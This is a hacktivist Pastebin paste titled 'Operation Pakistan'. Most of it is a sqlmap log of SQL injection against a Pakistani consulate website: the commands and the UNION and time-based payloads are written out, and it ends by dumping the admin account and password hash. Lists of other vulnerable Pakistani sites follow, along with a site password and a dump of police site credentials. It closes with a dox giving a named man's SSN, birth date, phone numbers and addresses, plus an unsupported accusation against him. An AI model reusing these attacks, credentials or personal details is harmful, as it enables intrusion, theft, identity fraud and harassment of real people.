API tools faq
paste
Advertisement
xtam4

Operation Pakistan September 6th-8th.

xtam4
Sep 8th, 2014
2,506
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.79 KB | None | 0 0
raw download clone embed print report
  1. ____ ____ ____ ____ ____ ____ ___ ____ _ _ _ ____ ___ ____ _ _ ____ ____ _ _ _ _ _ _
  2. | __ |___ | | |__/ | |___ |__] |__| |_/ | [__ | |__| |\ | |___ |__| |\/| | | \_/
  3. |__] | |__| | \ |___ |___ | | | | \_ | ___] | | | | \| | | | | | | |___ |
  4.  
  5.  
  6.  
  7.  
  8.  
  9. #Operation #Pakistan.
  10.  
  11. Hacking at its Finest.
  12.  
  13. ~XTAM4
  14.  
  15. ~Mr.Instinct
  16.  
  17. ~G Force Family
  18.  
  19.  
  20. #XTAM4
  21. Operation planned by: Mr.Instinct
  22. Main Contributors: Xtam4, Axid Burn and Balalaika.
  23.  
  24.  
  25.  
  26. Main Target: http://www.pakconsulatejeddah.gov.pk/index.php
  27.  
  28.  
  29.  
  30. [*] starting at 15:13:28
  31.  
  32. [15:13:31] [INFO] testing connection to the target URL
  33. [15:13:37] [INFO] testing if the target URL is stable. This can take a couple of seconds
  34. [15:13:41] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor
  35.  
  36. injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a
  37.  
  38. string or regular expression to match on
  39. how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
  40. [15:14:08] [INFO] testing if GET parameter 'option' is dynamic
  41. [15:14:09] [INFO] confirming that GET parameter 'option' is dynamic
  42. [15:14:11] [INFO] GET parameter 'option' is dynamic
  43. [15:14:12] [WARNING] heuristic (basic) test shows that GET parameter 'option' might not be injectable
  44. [15:14:12] [INFO] testing for SQL injection on GET parameter 'option'
  45. [15:14:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  46. [15:14:13] [WARNING] reflective value(s) found and filtering out
  47. [15:14:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  48. [15:14:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  49. [15:14:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
  50. [15:14:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  51. [15:15:01] [INFO] testing 'MySQL inline queries'
  52. [15:15:02] [INFO] testing 'PostgreSQL inline queries'
  53. [15:15:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
  54. [15:15:06] [INFO] testing 'Oracle inline queries'
  55. [15:15:07] [INFO] testing 'SQLite inline queries'
  56. [15:15:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  57. [15:15:08] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as
  58.  
  59. possible (e.g. 10 or more)
  60. [15:15:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  61. [15:15:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
  62. [15:15:37] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  63. [15:15:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  64. [15:15:54] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
  65. [15:16:01] [INFO] testing 'Oracle AND time-based blind'
  66. [15:16:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
  67. [15:17:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  68. [15:17:44] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly
  69.  
  70. set it using option '--dbms'
  71. [15:19:43] [WARNING] GET parameter 'option' is not injectable
  72. [15:19:43] [INFO] testing if GET parameter 'item' is dynamic
  73. [15:19:44] [INFO] confirming that GET parameter 'item' is dynamic
  74. [15:19:45] [INFO] GET parameter 'item' is dynamic
  75. [15:19:45] [WARNING] heuristic (basic) test shows that GET parameter 'item' might not be injectable
  76. [15:19:45] [INFO] testing for SQL injection on GET parameter 'item'
  77. [15:19:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  78. [15:20:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  79. [15:20:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  80. [15:20:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
  81. [15:20:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  82. [15:20:44] [INFO] testing 'MySQL inline queries'
  83. [15:20:45] [INFO] testing 'PostgreSQL inline queries'
  84. [15:20:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
  85. [15:20:50] [INFO] testing 'Oracle inline queries'
  86. [15:20:52] [INFO] testing 'SQLite inline queries'
  87. [15:20:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  88. [15:21:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  89. [15:21:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
  90. [15:21:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  91. [15:21:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  92. [15:21:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
  93. [15:21:47] [INFO] testing 'Oracle AND time-based blind'
  94. [15:21:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
  95. [15:23:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  96. [15:25:16] [WARNING] GET parameter 'item' is not injectable
  97. [15:25:16] [INFO] testing if GET parameter 'item_id' is dynamic
  98. [15:25:17] [INFO] confirming that GET parameter 'item_id' is dynamic
  99. [15:25:18] [INFO] GET parameter 'item_id' is dynamic
  100. [15:25:19] [INFO] heuristic (basic) test shows that GET parameter 'item_id' might be injectable (possible DBMS: 'PostgreSQL or
  101.  
  102. MySQL')
  103. [15:25:19] [INFO] testing for SQL injection on GET parameter 'item_id'
  104. heuristic (parsing) test showed that the back-end DBMS could be 'PostgreSQL or MySQL'. Do you want to skip test payloads specific
  105.  
  106. for other DBMSes? [Y/n] y
  107. do you want to include all tests for 'PostgreSQL or MySQL' extending provided level (1) and risk (1)? [Y/n] y
  108. [15:25:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  109. [15:26:15] [INFO] GET parameter 'item_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
  110. [15:26:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  111. [15:26:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
  112. [15:26:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
  113. [15:26:26] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
  114. [15:26:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  115. [15:26:38] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
  116. [15:26:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
  117. [15:26:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
  118. [15:26:58] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
  119. [15:27:00] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
  120. [15:27:06] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
  121. [15:27:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
  122. [15:27:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
  123. [15:27:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
  124. [15:27:12] [INFO] testing 'PostgreSQL error-based - Parameter replace'
  125. [15:27:13] [INFO] testing 'MySQL inline queries'
  126. [15:27:15] [INFO] testing 'PostgreSQL inline queries'
  127. [15:27:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  128. [15:27:19] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  129. [15:27:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  130. [15:27:21] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
  131. [15:27:23] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
  132. [15:27:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  133. [15:27:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
  134. [15:27:39] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
  135. [15:27:52] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
  136. [15:28:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  137. [15:28:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
  138. [15:28:10] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
  139. [15:28:12] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
  140. [15:28:16] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
  141. [15:29:16] [INFO] GET parameter 'item_id' is 'MySQL > 5.0.11 OR time-based blind' injectable
  142. [15:29:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  143. [15:29:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other
  144.  
  145. potential injection technique found
  146. [15:29:23] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query
  147.  
  148. columns. Automatically extending the range for current UNION query injection technique test
  149. [15:29:28] [INFO] target URL appears to have 13 columns in query
  150. [15:30:01] [INFO] GET parameter 'item_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
  151. GET parameter 'item_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
  152. sqlmap identified the following injection points with a total of 429 HTTP(s) requests:
  153. ---
  154. Place: GET
  155. Parameter: item_id
  156. Type: boolean-based blind
  157. Title: AND boolean-based blind - WHERE or HAVING clause
  158. Payload: option=page&item=show&item_id=51 AND 2145=2145
  159.  
  160. Type: UNION query
  161. Title: MySQL UNION query (NULL) - 13 columns
  162. Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT
  163.  
  164. (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  165.  
  166. Type: AND/OR time-based blind
  167. Title: MySQL > 5.0.11 OR time-based blind
  168. Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
  169. ---
  170. [15:32:31] [INFO] the back-end DBMS is MySQL
  171. web application technology: Apache 2.2.23, PHP 5.2.17
  172. back-end DBMS: MySQL 5.0.11
  173. [15:32:31] [INFO] fetching database names
  174. [15:32:47] [INFO] the SQL query used returns 3 entries
  175. [15:32:49] [INFO] retrieved: "information_schema"
  176. [15:32:50] [INFO] retrieved: "pakcons_consulate"
  177. [15:32:58] [INFO] retrieved: "pakcons_tns"
  178. available databases [3]:
  179. [*] information_schema
  180. [*] pakcons_consulate
  181. [*] pakcons_tns
  182.  
  183. [15:32:58] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'
  184.  
  185. [*] shutting down at 15:32:58
  186.  
  187. root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate --
  188.  
  189. tables
  190.  
  191. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  192. http://sqlmap.org
  193.  
  194. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
  195.  
  196. responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for
  197.  
  198. any misuse or damage caused by this program
  199.  
  200. [*] starting at 15:34:27
  201.  
  202. [15:34:27] [INFO] resuming back-end DBMS 'mysql'
  203. [15:34:29] [INFO] testing connection to the target URL
  204. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  205. ---
  206. Place: GET
  207. Parameter: item_id
  208. Type: boolean-based blind
  209. Title: AND boolean-based blind - WHERE or HAVING clause
  210. Payload: option=page&item=show&item_id=51 AND 2145=2145
  211.  
  212. Type: UNION query
  213. Title: MySQL UNION query (NULL) - 13 columns
  214. Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT
  215.  
  216. (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  217.  
  218. Type: AND/OR time-based blind
  219. Title: MySQL > 5.0.11 OR time-based blind
  220. Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
  221. ---
  222. [15:34:34] [INFO] the back-end DBMS is MySQL
  223. web application technology: Apache 2.2.23, PHP 5.2.17
  224. back-end DBMS: MySQL 5.0.11
  225. [15:34:34] [INFO] fetching tables for database: 'pakcons_consulate'
  226. [15:34:38] [INFO] the SQL query used returns 23 entries
  227. [15:34:39] [INFO] retrieved: "admin"
  228. [15:34:41] [INFO] retrieved: "blocks"
  229. [15:34:43] [INFO] retrieved: "gallery"
  230. [15:34:45] [INFO] retrieved: "gallery_images"
  231. [15:34:46] [INFO] retrieved: "news"
  232. [15:34:48] [INFO] retrieved: "pages"
  233. [15:34:52] [INFO] retrieved: "report_files"
  234. [15:34:53] [INFO] retrieved: "reports"
  235. [15:34:55] [INFO] retrieved: "slideshow"
  236. [15:34:56] [INFO] retrieved: "url_alias"
  237. [15:34:58] [INFO] retrieved: "users"
  238. [15:35:01] [INFO] retrieved: "videos"
  239. [15:35:02] [INFO] retrieved: "wp_commentmeta"
  240. [15:35:04] [INFO] retrieved: "wp_comments"
  241. [15:35:07] [INFO] retrieved: "wp_links"
  242. [15:35:09] [INFO] retrieved: "wp_options"
  243. [15:35:10] [INFO] retrieved: "wp_postmeta"
  244. [15:35:11] [INFO] retrieved: "wp_posts"
  245. [15:35:13] [INFO] retrieved: "wp_term_relationships"
  246. [15:35:15] [INFO] retrieved: "wp_term_taxonomy"
  247. [15:35:16] [INFO] retrieved: "wp_terms"
  248. [15:35:17] [INFO] retrieved: "wp_usermeta"
  249. [15:35:18] [INFO] retrieved: "wp_users"
  250. Database: pakcons_consulate
  251. [23 tables]
  252. +-----------------------+
  253. | admin |
  254. | blocks |
  255. | gallery |
  256. | gallery_images |
  257. | news |
  258. | pages |
  259. | report_files |
  260. | reports |
  261. | slideshow |
  262. | url_alias |
  263. | users |
  264. | videos |
  265. | wp_commentmeta |
  266. | wp_comments |
  267. | wp_links |
  268. | wp_options |
  269. | wp_postmeta |
  270. | wp_posts |
  271. | wp_term_relationships |
  272. | wp_term_taxonomy |
  273. | wp_terms |
  274. | wp_usermeta |
  275. | wp_users |
  276. +-----------------------+
  277.  
  278. [15:35:18] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'
  279.  
  280. [*] shutting down at 15:35:18
  281.  
  282. root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate -T
  283.  
  284. admin --columns
  285.  
  286. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  287. http://sqlmap.org
  288.  
  289. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
  290.  
  291. responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for
  292.  
  293. any misuse or damage caused by this program
  294.  
  295. [*] starting at 15:36:44
  296.  
  297. [15:36:45] [INFO] resuming back-end DBMS 'mysql'
  298. [15:36:47] [INFO] testing connection to the target URL
  299. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  300. ---
  301. Place: GET
  302. Parameter: item_id
  303. Type: boolean-based blind
  304. Title: AND boolean-based blind - WHERE or HAVING clause
  305. Payload: option=page&item=show&item_id=51 AND 2145=2145
  306.  
  307. Type: UNION query
  308. Title: MySQL UNION query (NULL) - 13 columns
  309. Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT
  310.  
  311. (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  312.  
  313. Type: AND/OR time-based blind
  314. Title: MySQL > 5.0.11 OR time-based blind
  315. Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
  316. ---
  317. [15:36:51] [INFO] the back-end DBMS is MySQL
  318. web application technology: Apache 2.2.23, PHP 5.2.17
  319. back-end DBMS: MySQL 5.0.11
  320. [15:36:51] [INFO] fetching columns for table 'admin' in database 'pakcons_consulate'
  321. [15:36:56] [INFO] the SQL query used returns 5 entries
  322. [15:36:57] [INFO] retrieved: "id","int(11)"
  323. [15:36:58] [INFO] retrieved: "full_name","varchar(100)"
  324. [15:36:59] [INFO] retrieved: "username","varchar(100)"
  325. [15:37:01] [INFO] retrieved: "password","varchar(100)"
  326. [15:37:03] [INFO] retrieved: "email","varchar(100)"
  327. Database: pakcons_consulate
  328. Table: admin
  329. [5 columns]
  330. +-----------+--------------+
  331. | Column | Type |
  332. +-----------+--------------+
  333. | email | varchar(100) |
  334. | full_name | varchar(100) |
  335. | id | int(11) |
  336. | password | varchar(100) |
  337. | username | varchar(100) |
  338. +-----------+--------------+
  339.  
  340. [15:37:03] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'
  341.  
  342. [*] shutting down at 15:37:03
  343.  
  344. root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51%27" -D pakcons_consulate
  345.  
  346. -T admin -C email,full_name,id,password,username --dump
  347.  
  348. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  349. http://sqlmap.org
  350.  
  351. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
  352.  
  353. responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for
  354.  
  355. any misuse or damage caused by this program
  356.  
  357. [*] starting at 15:38:20
  358.  
  359. [15:38:20] [WARNING] it appears that you have provided tainted parameter values ('item_id=51'') with most probably leftover
  360.  
  361. chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to
  362.  
  363. properly run
  364. Are you sure you want to continue? [y/N] n
  365.  
  366. [*] shutting down at 15:38:33
  367.  
  368. root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate -T
  369.  
  370. admin -C email,full_name,id,password,username --dump
  371.  
  372. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  373. http://sqlmap.org
  374.  
  375. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
  376.  
  377. responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for
  378.  
  379. any misuse or damage caused by this program
  380.  
  381. [*] starting at 15:39:08
  382.  
  383. [15:39:08] [INFO] resuming back-end DBMS 'mysql'
  384. [15:39:11] [INFO] testing connection to the target URL
  385. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  386. ---
  387. Place: GET
  388. Parameter: item_id
  389. Type: boolean-based blind
  390. Title: AND boolean-based blind - WHERE or HAVING clause
  391. Payload: option=page&item=show&item_id=51 AND 2145=2145
  392.  
  393. Type: UNION query
  394. Title: MySQL UNION query (NULL) - 13 columns
  395. Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT
  396.  
  397. (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  398.  
  399. Type: AND/OR time-based blind
  400. Title: MySQL > 5.0.11 OR time-based blind
  401. Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
  402. ---
  403. [15:39:18] [INFO] the back-end DBMS is MySQL
  404. web application technology: Apache 2.2.23, PHP 5.2.17
  405. back-end DBMS: MySQL 5.0.11
  406. [15:39:18] [INFO] fetching columns 'email, full_name, id, password, username' for table 'admin' in database 'pakcons_consulate'
  407. [15:39:18] [INFO] the SQL query used returns 5 entries
  408. [15:39:19] [INFO] retrieved: "id","int(11)"
  409. [15:39:21] [INFO] retrieved: "full_name","varchar(100)"
  410. [15:39:22] [INFO] retrieved: "username","varchar(100)"
  411. [15:39:23] [INFO] retrieved: "password","varchar(100)"
  412. [15:39:24] [INFO] retrieved: "email","varchar(100)"
  413. [15:39:24] [INFO] fetching entries of column(s) 'email, full_name, id, password, username' for table 'admin' in database
  414.  
  415. 'pakcons_consulate'
  416. [15:39:24] [INFO] the SQL query used returns 1 entries
  417. [15:39:25] [INFO] retrieved: "[email protected]","M. Amir Khan","1","1c677...
  418. [15:39:25] [INFO] analyzing table dump for possible password hashes
  419. [15:39:25] [INFO] recognized possible password hashes in column 'password'
  420. do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
  421. [15:39:43] [INFO] writing hashes to a temporary file '/tmp/sqlmaphashes-8nqFtk.txt'
  422. do you want to crack them via a dictionary-based attack? [Y/n/q] n
  423. Database: pakcons_consulate
  424. Table: admin
  425. [1 entry]
  426. +----+----------------------+-------------+----------------------------------+--------------+
  427. | id | email | username | password | full_name |
  428. +----+----------------------+-------------+----------------------------------+--------------+
  429. | 1 | [email protected] | pakadmincon | 1c6770d0e097b9a1dc3b76767991ba85 | M. Amir Khan |
  430. +----+----------------------+-------------+----------------------------------+--------------+
  431.  
  432. [15:39:46] [INFO] table 'pakcons_consulate.admin' dumped to CSV file
  433.  
  434. '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk/dump/pakcons_consulate/admin.csv'
  435. [15:39:46] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'
  436.  
  437. -----------------------------------------------------------------------------------------------------------------
  438. #Mr.Instinct
  439.  
  440. http://www.stat.com.pk/search.php?modid=422
  441. http://www.hotline.pk/search.php?&visit=422
  442. http://www.playtube.pk/search.php?q=indian+songs&st=169&o=rating
  443. http://indusblog.com.pk/indusblog/indusblog%20backup/
  444. http://dev.evsoft.pk/evs/hameed/EVS%20Point%20of%20Sales/evs%20posv%20last%20backup%2027-05-14/evs%20posv/
  445. http://www.stat.com.pk/search.php?modid=422
  446. http://www.hotline.pk/search.php?&visit=422
  447. http://www.playtube.pk/search.php?q=indian+songs&st=169&o=rating
  448. http://pharmapack.pk
  449. password:djihade
  450. http://www.clickme.com.pk/search.php?searchfiled=jgfc&categoryfiled=0
  451. http://profile.hec.gov.pk/index.php?comp=forgot-password.php
  452. http://pogo.pk/new/backup-12.2.2013_00-47-59_pakistan
  453. http://indusblog.com.pk/indusblog/indusblog%20backup/
  454. http://dev.evsoft.pk/evs/hameed/EVS%20Point%20of%20Sales/evs%20posv%20last%20backup%2027-05-14/evs%20posv/
  455. http://www.clickme.com.pk/search.php?searchfiled=jgfc&categoryfiled=0
  456.  
  457. ----------------------------------------------------
  458. #Axid Burn
  459.  
  460.  
  461. http://swissbusinesscouncil.com.pk/pages.php?pageid=7'&id=4'
  462. http://www.amch.edu.pk/page_detail.php?page_id=61'
  463. http://www.amch.edu.pk/page.php?page_id=34'
  464. http://www.arttechniques.com.pk/page.php?page_id=21'
  465. http://www.mb.com.pk/products.php?id=28%27'
  466. http://www.jsm.com.pk/products/details?pr=9'
  467. http://prcs.org.pk/page.php?pg_id=52'
  468. http://www.prcs.org.pk/faq.php
  469. http://finance-mansehra.gov.pk/hospitals.php
  470. http://www.hangal.com.pk/quickLinks.php
  471.  
  472.  
  473. ----------------------------------------------------
  474. #El-Capitân Balalaika
  475.  
  476.  
  477. http://www.faisalabadpolice.gov.pk/
  478. admin panel not found
  479.  
  480. http://www.faisalabadpolice.gov.pk/page.php
  481. XSS vulnerable
  482.  
  483. +------+----------------------+--------+--------------------+
  484. | u_id | u_pass | u_type | u_name |
  485. +------+----------------------+--------+--------------------+
  486. | 6 | U2FqYU5TYWllTjc4Ng== | 0 | allahg1 |
  487. | 7 | MTIzNDU= | 1 | Balochani |
  488. | 8 | MTIzNDU= | 1 | Civil Lines |
  489. | 9 | MTIzNDU= | 1 | Rail Bazar |
  490. | 10 | MTIzNDU= | 1 | Kotwali |
  491. | 11 | MTIzNDU= | 1 | Jhang Bazar |
  492. | 12 | MTIzNDU= | 1 | Women |
  493. | 13 | MTIzNDU= | 1 | Gulberg |
  494. | 14 | MTAwMjE= | 1 | GM Abad |
  495. | 15 | MTIzNDU= | 1 | Raza Abad |
  496. | 16 | MTIzNDU= | 1 | Peoples Colony |
  497. | 17 | MTIzNDU= | 1 | Madina Town |
  498. | 18 | MTIzNDU= | 1 | Sargodha Road |
  499. | 19 | MTIzNDU= | 1 | Mansoor Abad |
  500. | 20 | MTIzNDU= | 1 | Nishat Abad |
  501. | 21 | MTIzNDU= | 1 | Millat Town |
  502. | 22 | MTIzNDU= | 1 | Chak Jhumra |
  503. | 23 | Nzg2YXNpZg== | 1 | Sahianwala |
  504. | 24 | MTIzNDU= | 1 | Batala Colony |
  505. | 25 | MTIzNDU= | 1 | D-Type Colony |
  506. | 26 | MTIzNDU= | 1 | Factory Area |
  507. | 27 | MTIzNDU= | 1 | Saman Abad |
  508. | 28 | MTIzNDU= | 1 | Dijkot |
  509. | 29 | MTIzNDU= | 1 | Sadar |
  510. | 30 | MTIzNDU= | 1 | Thekriwala |
  511. | 31 | MTIzNDU= | 1 | Sandalbar |
  512. | 32 | MTIzNDU= | 1 | City Jaranwala |
  513. | 33 | MTIzNDU= | 1 | Sadar Jaranwala |
  514. | 34 | MTIzNDU= | 1 | Satiana |
  515. | 35 | MTIzNDU= | 1 | Rodala Road |
  516. | 36 | MTIzNDU= | 1 | Lundianwala |
  517. | 37 | MTIzNDU= | 1 | Khurrianwala |
  518. | 38 | MTIzNDU= | 1 | City Samundari |
  519. | 39 | MTIzNDU= | 1 | Sadar Samundari |
  520. | 40 | MTIzNDU= | 1 | Mureed Wala |
  521. | 41 | MTIzNDU= | 1 | Tarkhani |
  522. | 42 | MTIzNDU= | 1 | City Tandlianwala |
  523. | 43 | MTIzNDU= | 1 | Sadar Tandlianwala |
  524. | 44 | MTIzNDU= | 1 | Bahlak |
  525. | 45 | bWFuem9vcg== | 1 | Garh |
  526. | 46 | MTIzNDU= | 1 | Mamon Kanjan |
  527. | 53 | b3JwMTIz | 2 | pro |
  528.  
  529.  
  530. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  531.  
  532. http://sbp.org.pk
  533.  
  534. Entire site is XSS vulnerable
  535.  
  536. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  537.  
  538. http://www.aaj.tv/
  539.  
  540. XSS vulnerable 83+
  541.  
  542.  
  543. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  544.  
  545.  
  546.  
  547.  
  548. Doxes/Hits:
  549.  
  550.  
  551. John O Brennan
  552.  
  553. SSN: 146-42-3250
  554.  
  555. DOB: 09/22/1955
  556.  
  557. Phone Number's: (703) 435-8772, (703) 738-2877, (703) 435-7720,(703) 435-8772, (703) 742-3349
  558.  
  559. Address: 13251 Point Rider Ln
  560.  
  561. Herndon, VA 20171
  562.  
  563. Previous Addresses:
  564.  
  565. PO Box 597 Warrenton, VA 20188
  566. 6857 Lafayette Park Dr Annandale, VA 22003
  567.  
  568. John O Brennan armed Al Qaeda, and Tehreek-E-Taliban in Pakistan.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!